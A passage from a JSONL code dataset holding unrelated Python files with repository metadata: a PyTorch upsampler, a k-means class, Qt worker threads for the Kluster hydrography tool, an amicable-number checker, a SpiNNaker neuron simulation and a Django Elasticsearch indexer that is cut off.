np.ndarray\n Shifted vertex position (position of shower maximum) in meter and\n shifted vertex time in nano seconds.\n \"\"\"\n\n return shift_to_maximum(\n x=x, y=y, z=z, zenith=zenith, azimuth=azimuth,\n ref_energy=ref_energy, t=t, eps=eps, reverse=False,\n )\n","repo_name":"icecube/event-generator","sub_path":"egenerator/data/modules/labels/snowstorm_tracks.py","file_name":"snowstorm_tracks.py","file_ext":"py","file_size_in_byte":19278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35498491580","text":"from typing import List\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Upsampler(nn.Module):\n \"\"\"Whisper to signal-level upsampler.\n \"\"\"\n def __init__(self, channels: int, kernels: int, scales: List[int], leak: float):\n \"\"\"Initializer.\n Args:\n channels: size of the input channels.\n kernels: size of the convolutional kernels.\n scales: upsampling scales.\n leak: leaky relu coefficient.\n \"\"\"\n super().__init__()\n self.scales = scales\n self.conv = nn.utils.weight_norm(\n nn.Conv1d(channels, channels, kernels, padding=kernels // 2, bias=False))\n self.upsamples = nn.ModuleList([\n nn.Sequential(\n nn.utils.weight_norm(\n nn.Conv2d(1, 1, (1, scale * 2 + 1), padding=(0, scale), bias=False)),\n nn.LeakyReLU(leak))\n for scale in scales])\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n \"\"\"Upsample the inputs.\n Args:\n inputs: [torch.float32; [B, C, T]], input tensor.\n Returns:\n [torch.float32; [B, C, T x prod(scales)]], upsampled.\n \"\"\"\n # [B, 1, C, T]\n x = self.conv(inputs)[:, None]\n for scale, conv in zip(self.scales, self.upsamples):\n # [B, 1, C, T x scale]\n x = conv(\n F.interpolate(x, scale_factor=(1, scale), mode='nearest'))\n # [B, C, T x prod(scales)]\n return x.squeeze(1)\n","repo_name":"revsic/torch-whisper-guided-vc","sub_path":"wgvc/upsampler.py","file_name":"upsampler.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"3"} +{"seq_id":"42270867697","text":"import numpy as np\nfrom numpy.linalg import norm\nimport matplotlib.pyplot as plt\n\n\nclass MyKMeans:\n \"\"\"\n Class that implements the k-means algorithm for clustering data\n \"\"\"\n\n def plot_data(self):\n plt.scatter(self.dataset, np.zeros(len(self.dataset)))\n plt.scatter(self.centroids, np.zeros(len(self.centroids)), marker='p', s=100,\n c='r', label='centroid')\n plt.show()\n\n def compute_centroids(self, labels, dataset, clusters):\n self.centroids = np.zeros((self.clusters_number, dataset.shape[1]))\n for cluster in range(clusters):#the centeroid is the mean of all the values that are in that cluster\n self.centroids[cluster, :] = np.mean(dataset[labels == cluster, :], axis=0)\n\n def find_closest_cluster(self, distances):\n \"\"\"\n Method that find the minimum distance for each data point, one point /column\n :param distances:\n :return: minimum distance for each data point\n \"\"\"\n return np.argmin(distances, axis=0)\n\n def compute_distances(self):\n distances = np.zeros((self.centroids.shape[0], self.dataset.shape[0]))\n\n for cluster in range(self.centroids.shape[0]):\n distances[cluster, :] = np.square(norm(dataset - self.centroids[cluster, :], axis=1))\n\n return distances\n\n def initialize_centroids(self):\n \"\"\"\n Shuffles the dataset and select randomly the values for the centroids\n \"\"\"\n shuffled_dataset = np.random.permutation(self.dataset.shape[0]) # the number of rows\n\n return dataset[shuffled_dataset[:clusters]]\n\n def train(self, iterations=100):\n \"\"\"\n Function that implements the kmeans clustering algorithm\n :param clusters: number of iterations, by default is 100\n :return: the values of the clusters computed\n \"\"\"\n\n for i in range(iterations):\n old_centroids = self.centroids\n distances = self.compute_distances()\n labels = self.find_closest_cluster(distances)\n print(labels)\n self.compute_centroids(labels, dataset, clusters)\n if np.all(old_centroids == self.centroids): # if not even a single centroid has changed\n break\n\n return self.centroids\n\n def __init__(self, clusters, dataset): #by default it's 100 iterations\n self.clusters_number = clusters\n self.dataset = dataset\n self.centroids = self.initialize_centroids()\n\n\nif __name__ == \"__main__\":\n dataset = np.array([[2, 4, 3, 4, 60, 70, 80], [1, 2, 100, 2054, 30, 2600, 9504]])\n dataset = dataset.transpose()\n clusters = 2\n cluster_algo = MyKMeans(clusters, dataset)\n\n print(f\"Final centroids: {cluster_algo.train()}\")\n","repo_name":"ServoCryptid/DataMining","sub_path":"k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33425851795","text":"import os.path\n\nimport numpy as np\nimport traceback\nimport logging\n\nfrom HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal\nfrom HSTB.kluster.fqpr_project import return_project_data, reprocess_fqprs\nfrom HSTB.kluster import kluster_variables\nfrom HSTB.kluster.fqpr_convenience import generate_new_surface, import_processed_navigation, overwrite_raw_navigation, \\\n update_surface, reload_data, reload_surface, points_to_surface, generate_new_mosaic\n\n\nclass MyWorker(QtCore.QThread):\n\n tstarted = Signal(bool)\n tfinished = Signal(bool)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.error = False\n self.action_type = None\n self.errortxt = ''\n self.exceptiontxt = None\n\n def reset(self):\n self.error = False\n self.errortxt = ''\n self.exceptiontxt = None\n\n def log_exception(self, e: Exception):\n self.error = True\n self.errortxt = str(e)\n self.exceptiontxt = traceback.format_exc()\n\n def show_error(self):\n if self.errortxt:\n msgbox = QtWidgets.QMessageBox()\n msgbox.setText(f'ERROR: {self.action_type}')\n msgbox.setInformativeText(self.errortxt)\n msgbox.setDetailedText(self.exceptiontxt)\n msgbox.exec_()\n\n\nclass ActionWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.action_container = None\n self.action_index = None\n self.result = None\n\n def populate(self, action_container, action_index):\n super().reset()\n self.action_container = action_container\n self.action_index = action_index\n self.result = None\n\n def run(self):\n self.tstarted.emit(True)\n try:\n action = self.action_container.actions[self.action_index]\n self.parent().debug_print(f'current action container')\n self.parent().debug_print(f'running {action}: {action.function}, kwargs={action.kwargs}', logging.INFO)\n self.action_type = action.action_type\n self.result = self.action_container.execute_action(self.action_index)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass OpenProjectWorker(MyWorker):\n \"\"\"\n Thread that runs when the user drags in a new project file or opens a project using the menu\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.new_project_path = None\n self.force_add_fqprs = None\n self.force_add_surfaces = None\n self.new_fqprs = []\n self.new_surfaces = []\n\n def populate(self, new_project_path=None, force_add_fqprs=None, force_add_surfaces=None):\n super().reset()\n self.new_project_path = new_project_path\n self.force_add_fqprs = force_add_fqprs\n self.force_add_surfaces = force_add_surfaces\n self.new_fqprs = []\n self.new_surfaces = []\n\n def run(self):\n self.tstarted.emit(True)\n try:\n self.action_type = 'Open Project'\n self.new_fqprs = []\n if self.new_project_path:\n data = return_project_data(self.new_project_path)\n else:\n data = {'fqpr_paths': [], 'surface_paths': []}\n if self.force_add_fqprs:\n data['fqpr_paths'] = self.force_add_fqprs\n if self.force_add_surfaces:\n data['surface_paths'] = self.force_add_surfaces\n self.parent().debug_print(f'loading {data}', logging.INFO)\n for pth in data['fqpr_paths']:\n fqpr_entry = reload_data(pth, skip_dask=True, silent=True, show_progress=True)\n if fqpr_entry is not None: # no fqpr instance successfully loaded\n self.new_fqprs.append(fqpr_entry)\n else:\n self.parent().print('Unable to load converted data from {}'.format(pth), logging.WARNING)\n for pth in data['surface_paths']:\n surf_entry = reload_surface(pth)\n if surf_entry is not None: # no grid instance successfully loaded\n self.new_surfaces.append(surf_entry)\n else:\n self.parent().print('Unable to load surface from {}'.format(pth), logging.WARNING)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass DrawNavigationWorker(MyWorker):\n \"\"\"\n On opening a project, you have to get the navigation for each line and draw it in the 2d view\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.project = None\n self.new_fqprs = None\n self.line_data = {}\n\n def populate(self, project, new_fqprs):\n super().reset()\n self.project = project\n self.new_fqprs = new_fqprs\n self.line_data = {}\n\n def run(self):\n self.tstarted.emit(True)\n try:\n self.action_type = 'Draw Lines'\n for fq in self.new_fqprs:\n self.parent().print('building tracklines for {}...'.format(fq), logging.INFO)\n for ln in self.project.return_project_lines(proj=fq, relative_path=True):\n lats, lons = self.project.return_line_navigation(ln)\n if lats is not None:\n self.line_data[ln] = [lats, lons]\n self.parent().debug_print(f'project.return_line_navigation: drawing {ln}: {len(lats)} points, {lats[0]},{lons[0]} to {lats[-1]},{lons[-1]}', logging.INFO)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass DrawSurfaceWorker(MyWorker):\n \"\"\"\n On opening a new surface, you have to get the surface tiles to display as in memory geotiffs in kluster_main\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.surface_path = None\n self.surf_object = None\n self.resolution = None\n self.surface_layer_name = None\n self.surface_data = {}\n\n def populate(self, surface_path, surf_object, resolution, surface_layer_name):\n super().reset()\n self.surface_path = surface_path\n self.surf_object = surf_object\n self.resolution = resolution\n # handle optional hillshade layer\n self.surface_layer_name = surface_layer_name\n self.surface_data = {}\n\n def run(self):\n self.tstarted.emit(True)\n try:\n self.action_type = 'Draw Surface'\n if self.surface_layer_name == 'tiles':\n try:\n x, y = self.surf_object.get_tile_boundaries()\n self.parent().debug_print(f'surf_object.get_tile_boundaries: getting bathygrid tile boundaries, {len(x)} points from {x[0]},{y[0]} to {x[-1]},{y[-1]}', logging.INFO)\n self.surface_data = [x, y]\n except:\n self.parent().print('Unable to load tile layer from {}, no surface data found'.format(self.surface_path), logging.WARNING)\n self.surface_data = {}\n else:\n if self.surface_layer_name == 'hillshade':\n surface_layer_name = 'depth'\n else:\n surface_layer_name = self.surface_layer_name\n for resolution in self.resolution:\n self.surface_data[resolution] = {}\n chunk_count = 1\n for geo_transform, maxdim, data in self.surf_object.get_chunks_of_tiles(resolution=resolution, layer=surface_layer_name,\n override_maximum_chunk_dimension=kluster_variables.chunk_size_display,\n nodatavalue=np.float32(np.nan), z_positive_up=self.surf_object.positive_up,\n for_gdal=True):\n data = list(data.values())\n tilename = self.surface_layer_name + '_{}'.format(chunk_count)\n self.surface_data[resolution][tilename] = [data, geo_transform]\n chunk_count += 1\n self.parent().debug_print(f'surf_object.get_chunks_of_tiles: {self.surface_path} : {tilename} : {resolution}m geotransform {geo_transform} maxdimension {maxdim}', logging.INFO)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass LoadPointsWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.polygon = None\n self.azimuth = None\n self.project = None\n self.points_data = None\n\n def populate(self, polygon=None, azimuth=None, project=None):\n super().reset()\n self.polygon = polygon\n self.azimuth = azimuth\n self.project = project\n self.points_data = None\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = 'Load Points'\n try:\n self.parent().debug_print(f'project.return_soundings_in_polygon: Returning soundings within polygon {self.polygon}', logging.INFO)\n self.points_data = self.project.return_soundings_in_polygon(self.polygon)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ImportNavigationWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.fqpr_instances = []\n\n def populate(self, fq_chunks):\n super().reset()\n self.fq_chunks = fq_chunks\n self.fqpr_instances = []\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = 'Import Navigation'\n try:\n for chnk in self.fq_chunks:\n self.parent().debug_print(f'fqpr_convenience.import_processed_navigation {chnk[1]}', logging.INFO)\n self.fqpr_instances.append(import_processed_navigation(chnk[0], **chnk[1]))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass OverwriteNavigationWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.fqpr_instances = []\n\n def populate(self, fq_chunks):\n super().reset()\n self.fq_chunks = fq_chunks\n self.fqpr_instances = []\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = 'Overwrite Navigation'\n try:\n for chnk in self.fq_chunks:\n self.parent().debug_print(f'fqpr_convenience.overwrite_raw_navigation {chnk[1]}', logging.INFO)\n self.fqpr_instances.append(overwrite_raw_navigation(chnk[0], **chnk[1]))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ExportWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.line_names = None\n self.datablock = []\n self.fqpr_instances = []\n self.export_type = ''\n self.mode = ''\n self.z_pos_down = False\n self.delimiter = ' '\n self.formattype = 'xyz'\n self.filterset = False\n self.separateset = False\n\n def populate(self, fq_chunks, line_names, datablock, export_type, z_pos_down, delimiter, formattype, filterset,\n separateset, basic_mode, line_mode, points_mode):\n super().reset()\n if basic_mode:\n self.mode = 'basic'\n elif line_mode:\n self.mode = 'line'\n elif points_mode:\n self.mode = 'points'\n\n self.fqpr_instances = []\n self.line_names = line_names\n self.datablock = datablock\n self.fq_chunks = fq_chunks\n self.export_type = export_type\n self.z_pos_down = z_pos_down\n if delimiter == 'comma':\n self.delimiter = ','\n elif delimiter == 'space':\n self.delimiter = ' '\n else:\n raise ValueError('ExportWorker: Expected either \"comma\" or \"space\", received {}'.format(delimiter))\n self.formattype = formattype\n self.filterset = filterset\n self.separateset = separateset\n\n def export_process(self, fq, datablock=None):\n if self.mode == 'basic':\n self.parent().debug_print(f'export_pings_to_file file_format={self.export_type}, csv_delimiter={self.delimiter}, filter_by_detection={self.filterset}, format_type={self.formattype}, z_pos_down={self.z_pos_down}, export_by_identifiers={self.separateset}', logging.INFO)\n fq.export_pings_to_file(file_format=self.export_type, csv_delimiter=self.delimiter, filter_by_detection=self.filterset,\n format_type=self.formattype, z_pos_down=self.z_pos_down, export_by_identifiers=self.separateset)\n elif self.mode == 'line':\n self.parent().debug_print(f'export_lines_to_file linenames={self.line_names}, file_format={self.export_type}, csv_delimiter={self.delimiter}, filter_by_detection={self.filterset}, format_type={self.formattype}, z_pos_down={self.z_pos_down}, export_by_identifiers={self.separateset}', logging.INFO)\n fq.export_lines_to_file(linenames=self.line_names, file_format=self.export_type, csv_delimiter=self.delimiter,\n filter_by_detection=self.filterset, format_type=self.formattype, z_pos_down=self.z_pos_down, export_by_identifiers=self.separateset)\n else:\n self.parent().debug_print(f'export_soundings_to_file file_format={self.export_type}, csv_delimiter={self.delimiter}, filter_by_detection={self.filterset}, format_type={self.formattype}, z_pos_down={self.z_pos_down}', logging.INFO)\n fq.export_soundings_to_file(datablock=datablock, file_format=self.export_type, csv_delimiter=self.delimiter,\n filter_by_detection=self.filterset, format_type=self.formattype, z_pos_down=self.z_pos_down)\n return fq\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Export Dataset ({self.mode})'\n try:\n if self.mode in ['basic', 'line']:\n for chnk in self.fq_chunks:\n self.fqpr_instances.append(self.export_process(chnk[0]))\n else:\n fq = self.fq_chunks[0][0]\n self.fqpr_instances.append(self.export_process(fq, datablock=self.datablock))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass FilterWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.line_names = None\n self.fqpr_instances = []\n self.new_status = []\n self.mode = ''\n self.selected_index = None\n self.filter_name = ''\n self.save_to_disk = True\n\n self.kwargs = None\n self.selected_index = []\n\n def populate(self, fq_chunks, line_names, filter_name, basic_mode, line_mode, points_mode, save_to_disk, kwargs):\n super().reset()\n if basic_mode:\n self.mode = 'basic'\n elif line_mode:\n self.mode = 'line'\n elif points_mode:\n self.mode = 'points'\n\n self.fqpr_instances = []\n self.new_status = []\n self.line_names = line_names\n self.fq_chunks = fq_chunks\n self.filter_name = filter_name\n self.save_to_disk = save_to_disk\n\n self.kwargs = kwargs\n if self.kwargs is None:\n self.kwargs = {}\n self.selected_index = []\n\n def filter_process(self, fq, subset_time=None, subset_beam=None):\n if self.mode == 'basic':\n self.parent().debug_print(f'run_filter {self.filter_name}, {self.kwargs}', logging.INFO)\n new_status = fq.run_filter(self.filter_name, **self.kwargs)\n fq.multibeam.reload_pingrecords()\n elif self.mode == 'line':\n self.parent().debug_print(f'run_filter {self.filter_name}, {self.kwargs}', logging.INFO)\n fq.subset_by_lines(self.line_names)\n new_status = fq.run_filter(self.filter_name, **self.kwargs)\n fq.restore_subset()\n fq.multibeam.reload_pingrecords()\n else:\n self.parent().debug_print(f'take the provided Points View time and subset the provided fqpr to just those times,beams', logging.INFO)\n selected_index = fq.subset_by_time_and_beam(subset_time, subset_beam)\n self.parent().debug_print(f'run_filter {self.filter_name}, {self.kwargs}', logging.INFO)\n new_status = fq.run_filter(self.filter_name, selected_index=selected_index, save_to_disk=self.save_to_disk, **self.kwargs)\n fq.restore_subset()\n if self.save_to_disk:\n fq.multibeam.reload_pingrecords()\n self.selected_index.append(selected_index)\n return fq, new_status\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Filter {self.filter_name} ({self.mode})'\n try:\n if self.mode in ['basic', 'line']:\n for chnk in self.fq_chunks:\n fq, new_status = self.filter_process(chnk[0])\n self.fqpr_instances.append(fq)\n self.new_status.append(new_status)\n else:\n for chnk in self.fq_chunks:\n fq, subset_time, subset_beam = chnk[0], chnk[1], chnk[2]\n fq, new_status = self.filter_process(fq, subset_time, subset_beam)\n self.fqpr_instances.append(fq)\n self.new_status.append(new_status)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ExportTracklinesWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fq_chunks = None\n self.line_names = None\n self.fqpr_instances = []\n self.export_type = ''\n self.mode = ''\n self.output_path = ''\n\n def populate(self, fq_chunks, line_names, export_type, basic_mode, line_mode, output_path):\n super().reset()\n if basic_mode:\n self.mode = 'basic'\n elif line_mode:\n self.mode = 'line'\n\n self.fqpr_instances = []\n self.line_names = line_names\n self.fq_chunks = fq_chunks\n self.export_type = export_type\n self.output_path = output_path\n\n def export_process(self, fq):\n if self.mode == 'basic':\n self.parent().debug_print(f'export_tracklines_to_file output_file={self.output_path}, file_format={self.export_type}', logging.INFO)\n fq.export_tracklines_to_file(linenames=None, output_file=self.output_path, file_format=self.export_type)\n elif self.mode == 'line':\n self.parent().debug_print(f'export_tracklines_to_file linenames={self.line_names} output_file={self.output_path}, file_format={self.export_type}', logging.INFO)\n fq.export_tracklines_to_file(linenames=self.line_names, output_file=self.output_path, file_format=self.export_type)\n return fq\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Export Tracklines ({self.mode})'\n try:\n for chnk in self.fq_chunks:\n self.fqpr_instances.append(self.export_process(chnk[0]))\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass ExportGridWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.surf_instance = None\n self.export_type = ''\n self.output_path = ''\n self.z_pos_up = True\n self.bag_kwargs = {}\n\n def populate(self, surf_instance, export_type, output_path, z_pos_up, bag_kwargs):\n super().reset()\n self.surf_instance = surf_instance\n self.export_type = export_type\n self.output_path = output_path\n self.bag_kwargs = bag_kwargs\n self.z_pos_up = z_pos_up\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Export Grid'\n try:\n self.parent().debug_print(f'surf_instance.export {self.output_path} export_type={self.export_type}, z_pos_up={self.z_pos_up}', logging.INFO)\n # None in the 4th arg to indicate you want to export all resolutions\n self.surf_instance.export(self.output_path, self.export_type, self.z_pos_up, None,\n override_maximum_chunk_dimension=kluster_variables.chunk_size_export,\n **self.bag_kwargs)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass SurfaceWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqpr_instances = None\n self.fqpr_surface = None\n self.opts = {}\n self.mode = 'from_fqpr'\n\n def populate(self, fqpr_instances, opts):\n super().reset()\n self.fqpr_instances = fqpr_instances\n self.fqpr_surface = None\n self.opts = opts\n self.mode = 'from_fqpr'\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'New Surface'\n try:\n if self.mode == 'from_fqpr':\n self.parent().debug_print(f'generate_new_surface {self.opts}', logging.INFO)\n self.fqpr_surface = generate_new_surface(self.fqpr_instances, **self.opts)\n elif self.mode == 'from_points':\n self.parent().debug_print(f'points_to_surface {self.opts}', logging.INFO)\n self.fqpr_surface = points_to_surface(self.fqpr_instances, **self.opts)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass MosaicWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqpr_instances = None\n self.fqpr_surface = None\n self.opts = {}\n\n def populate(self, fqpr_instances, opts):\n super().reset()\n self.fqpr_instances = fqpr_instances\n self.fqpr_surface = None\n self.opts = opts\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'New Mosaic'\n try:\n self.parent().debug_print(f'generate_new_mosaic {self.opts}', logging.INFO)\n self.fqpr_surface = generate_new_mosaic(self.fqpr_instances, **self.opts)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass SurfaceUpdateWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqpr_surface = None\n self.add_fqpr_instances = None\n self.add_lines = None\n self.remove_fqpr_names = None\n self.remove_lines = None\n self.opts = {}\n self.all_resolutions = None\n\n def populate(self, fqpr_surface, add_fqpr_instances, add_lines, remove_fqpr_names, remove_lines, opts, all_resolutions):\n super().reset()\n self.fqpr_surface = fqpr_surface\n self.add_fqpr_instances = add_fqpr_instances\n self.add_lines = add_lines\n self.remove_fqpr_names = remove_fqpr_names\n self.remove_lines = remove_lines\n self.all_resolutions = all_resolutions\n self.opts = opts\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Update Surface'\n try:\n self.parent().debug_print(f'update_surface add_fqpr={self.add_fqpr_instances}, add_lines={self.add_lines}, remove_fqpr={self.remove_fqpr_names}, remove_lines={self.remove_lines}, {self.opts}', logging.INFO)\n self.fqpr_surface, oldrez, newrez = update_surface(self.fqpr_surface, self.add_fqpr_instances, self.add_lines,\n self.remove_fqpr_names, self.remove_lines, **self.opts)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n\n\nclass PatchTestUpdateWorker(MyWorker):\n \"\"\"\n Executes code in a seperate thread.\n \"\"\"\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.fqprs = None\n self.newvalues = []\n self.headindex = None\n self.prefixes = None\n self.timestamps = None\n self.serial_number = None\n self.polygon = None\n self.vdatum_directory = None\n\n self.result = []\n\n def populate(self, fqprs=None, newvalues=None, headindex=None, prefixes=None, timestamps=None, serial_number=None,\n polygon=None, vdatum_directory=None):\n super().reset()\n self.fqprs = fqprs\n self.newvalues = newvalues\n self.headindex = headindex\n self.prefixes = prefixes\n self.timestamps = timestamps\n self.serial_number = serial_number\n self.polygon = polygon\n self.vdatum_directory = vdatum_directory\n\n self.result = []\n\n def run(self):\n self.tstarted.emit(True)\n self.action_type = f'Patch Test'\n try:\n self.parent().debug_print(f'reprocess_fqprs fqprs={self.fqprs}, newvalues={self.newvalues}, headindex={self.headindex}, prefixes={self.prefixes}, timestamps={self.timestamps}, serial_number={self.serial_number}, polygon={self.polygon}, vdatum_directory={self.vdatum_directory}', logging.INFO)\n self.fqprs, self.result = reprocess_fqprs(self.fqprs, self.newvalues, self.headindex, self.prefixes, self.timestamps,\n self.serial_number, self.polygon, self.vdatum_directory)\n except Exception as e:\n super().log_exception(e)\n self.tfinished.emit(True)\n","repo_name":"noaa-ocs-hydrography/kluster","sub_path":"HSTB/kluster/gui/kluster_worker.py","file_name":"kluster_worker.py","file_ext":"py","file_size_in_byte":26668,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"3"} +{"seq_id":"14693396741","text":"def aliquot(x):\n l=[]\n for i in range(1,x):\n if x%i==0:\n l.append(i)\n k=sum(l)\n return k\n \n# Check whether a pair of numbers is amicable or not\n\nnum1=int(input(\"Enter the first No:\"))\nnum2=int(input(\"Enter the second No:\"))\nif aliquot(num1)==num2 and aliquot(num2)==num1:\n print(\"Amicable Numbers\")\nelse:\n print(\"Not amicable numbers\")\n","repo_name":"raichalvarghese/Python","sub_path":"amicable.py","file_name":"amicable.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15230011233","text":"import pyNN.spiNNaker as p\nimport matplotlib.pyplot as plt\nimport pyNN.utility.plotting as plot\n\np.setup(0.1)\nruntime = 50\npopulations = []\ntitle = \"PyNN0.8 alpha synapse testing\"\n\npop_src1 = p.Population(1, p.SpikeSourceArray,\n {'spike_times': [[5, 15, 20, 30]]}, label=\"src1\")\n\npopulations.append(p.Population(1, p.IF_curr_alpha, {}, label=\"test\"))\n\npopulations[0].set(tau_syn_E=2)\npopulations[0].set(tau_syn_I=4)\n\n# define the projections\nexc_proj = p.Projection(pop_src1, populations[0],\n p.OneToOneConnector(),\n p.StaticSynapse(weight=1, delay=1),\n receptor_type=\"excitatory\")\ninh_proj = p.Projection(pop_src1, populations[0],\n p.OneToOneConnector(),\n p.StaticSynapse(weight=1, delay=10),\n receptor_type=\"inhibitory\")\n\npopulations[0].record(\"all\")\np.run(runtime)\n\nv = populations[0].get_data(\"v\")\ngsyn_exc = populations[0].get_data(\"gsyn_exc\")\ngsyn_inh = populations[0].get_data(\"gsyn_inh\")\nspikes = populations[0].get_data(\"spikes\")\n\nplot.Figure(\n plot.Panel(v.segments[0].filter(name='v')[0],\n ylabel=\"Membrane potential (mV)\",\n data_labels=[populations[0].label],\n yticks=True, xlim=(0, runtime)),\n plot.Panel(gsyn_exc.segments[0].filter(name='gsyn_exc')[0],\n ylabel=\"gsyn excitatory (mV)\",\n data_labels=[populations[0].label],\n yticks=True, xlim=(0, runtime)),\n plot.Panel(gsyn_inh.segments[0].filter(name='gsyn_inh')[0],\n ylabel=\"gsyn inhibitory (mV)\",\n data_labels=[populations[0].label],\n yticks=True, xlim=(0, runtime)),\n title=title,\n annotations=\"Simulated with {}\".format(p.name())\n)\nplt.show()\np.end()\n","repo_name":"SpiNNakerManchester/PyNN8Examples","sub_path":"examples/if_curr_alpha.py","file_name":"if_curr_alpha.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"5118441106","text":"import json\n\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.http import HttpResponse, JsonResponse\nfrom elasticsearch import Elasticsearch\n\nfrom .models import (\n Catalog,\n Organization,\n OrganizationCreateRequest,\n Resource,\n FileDetails,\n APIDetails,\n Dataset,\n DatasetAccessModel,\n DatasetAccessModelRequest,\n)\nfrom .utils import dataset_slug, get_average_rating\nfrom .enums import DataType\n\n# from django.utils.datastructures import MultiValueDictKeyError\n\nes_client = Elasticsearch(settings.ELASTICSEARCH)\n\n\n# TODO: New flow for rating, only update will be there.\ndef index_data(dataset_obj):\n if not dataset_obj.status == \"PUBLISHED\":\n return\n doc = {\n \"dataset_title\": dataset_obj.title,\n \"dataset_description\": dataset_obj.description,\n \"action\": dataset_obj.action,\n \"funnel\": dataset_obj.funnel,\n \"issued\": dataset_obj.issued,\n \"period_from\": dataset_obj.period_from,\n \"period_to\": dataset_obj.period_to,\n \"update_frequency\": dataset_obj.update_frequency,\n \"dataset_type\": dataset_obj.dataset_type,\n \"remote_issued\": dataset_obj.remote_issued,\n \"remote_modified\": dataset_obj.remote_modified,\n \"published_date\": dataset_obj.published_date,\n \"last_updated\": dataset_obj.last_updated,\n \"modified\": dataset_obj.modified,\n \"slug\": dataset_slug(dataset_obj.id),\n \"highlights\": dataset_obj.highlights or [],\n \"download_count\": dataset_obj.download_count,\n \"average_rating\": get_average_rating(dataset_obj),\n \"hvd_rating\": dataset_obj.hvd_rating,\n \"resource_count\": Resource.objects.filter(dataset=dataset_obj).count(),\n \"dynamic_date\": dataset_obj.is_datedynamic\n }\n\n geography = dataset_obj.geography.all()\n sector = dataset_obj.sector.all()\n tags = dataset_obj.tags.all()\n dataset_geography = []\n dataset_sector = []\n dataset_tag = []\n for geo in geography:\n dataset_geography.append(geo.name)\n for sec in sector:\n dataset_sector.append(sec.name)\n for tag in tags:\n dataset_tag.append(tag.name)\n doc[\"geography\"] = dataset_geography\n doc[\"sector\"] = dataset_sector\n doc[\"tags\"] = dataset_tag\n\n catalog_instance = Catalog.objects.get(id=dataset_obj.catalog_id)\n doc[\"catalog_title\"] = catalog_instance.title\n doc[\"catalog_description\"] = catalog_instance.description\n\n org_instance = Organization.objects.get(id=catalog_instance.organization_id)\n doc[\"org_title\"] = org_instance.title\n doc[\"org_description\"] = 